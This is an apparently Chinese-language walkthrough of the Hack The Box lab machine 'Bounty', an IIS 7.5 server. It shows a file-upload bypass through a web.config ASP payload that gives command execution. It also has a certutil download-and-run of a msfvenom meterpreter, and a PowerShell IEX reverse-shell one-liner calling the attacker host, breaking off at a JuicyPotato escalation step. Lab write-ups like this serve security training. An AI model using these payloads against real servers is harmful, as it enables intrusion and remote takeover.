Information

nmap

┌──(kali㉿kali)-[~/Documents/htb]
└─$ nmap -p- --min-rate 10000 10.10.10.93
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-16 08:21 EDT
Nmap scan report for 10.10.10.93
Host is up (0.26s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 50.01 seconds

┌──(kali㉿kali)-[~/Documents/htb]
└─$ nmap -sC -sV -p 80 10.10.10.93        
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-16 08:22 EDT
Nmap scan report for 10.10.10.93
Host is up (0.29s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Bounty
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.38 seconds

WEB shell

basic information

访问Web页面，同时根据插件得到信息：

结合microsoft IIS 版本对应关系，当前系统应为Windows Server 2008R2

File Upload

/transfer.aspx

看起来是个文件上传表单，那么尝试进行文件上传。选择一个正确的图片文件进行上传，回显信息是“successfuly”

修改文件后缀名为“aspx”，再次发送请求包，此时的相应为“Invalid file”

BruteForce

将其他asp文件后缀放进字典进行爆破

1	ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml

在Intruder模块中，将后缀名设置为参数，导入字典，并取消URL编码的选项。

对后缀名进行爆破的结果是允许config后缀文件上传。

Asp config RCE

在这篇博客中找到文件上传导致命令执行的POC。将POC保存至web.config进行上传

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />        
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes! 
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->

上传web.config文件后，访问/UploadedFiles目录下的web.config

将aspx命令执行代码，替换原POC中代码。用ping命令进行测试，本地可以接受到来自目标机的icmp数据

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c ping 10.10.14.15")
o = cmd.StdOut.Readall()
Response.write(o)
%>

Msf Shell

msfvenom生成shellcode

1 2	msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=1234 -f exe > shell.exe

msfconsole设置监听

利用命令执行将shellcode传输至目标机

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("certutil -urlcache -f http://10.10.14.15:808/shell.exe C:\\Users\\Public\\Documents\\shell.exe")
o = cmd.StdOut.Readall()
Response.write(o)
%>

再次利用命令执行，运行shellcode

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c C:\Users\Public\Documents\shell.exe")
o = cmd.StdOut.Readall()
Response.write(o)
%>

即可在msfconsole获得shell

privilege

查看权限

具有SeAssignPrimaryTokenPrivilege和SeImpersonatePrivilege权限

systeminfo

c:\windows\system32\inetsrv>systeminfo        
systeminfo                                          
                                                                                                        
Host Name:                 BOUNTY                                                                       
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:                  
Product ID:                55041-402-3606965-84760
Original Install Date:     5/30/2018, 12:22:24 AM
System Boot Time:          8/16/2023, 3:12:27 PM
System Manufacturer:       VMware, Inc.       
System Model:              VMware Virtual Platform                                                      
System Type:               x64-based PC                                                                 
Processor(s):              1 Processor(s) Installed. 
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,618 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,643 MB
Virtual Memory: In Use:    452 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.93

编辑Shells/Invoke-PowerShellTcp.ps1文件，在末尾加

1	Invoke-PowerShellTcp -Reverse -IPAddress x.x.x.x -Port 6666

新建sh.bat文件

1	powershell -c IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.15:808/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.15 -port 6666

使用certutil将sh.bat和juicy potato均传输到目标机上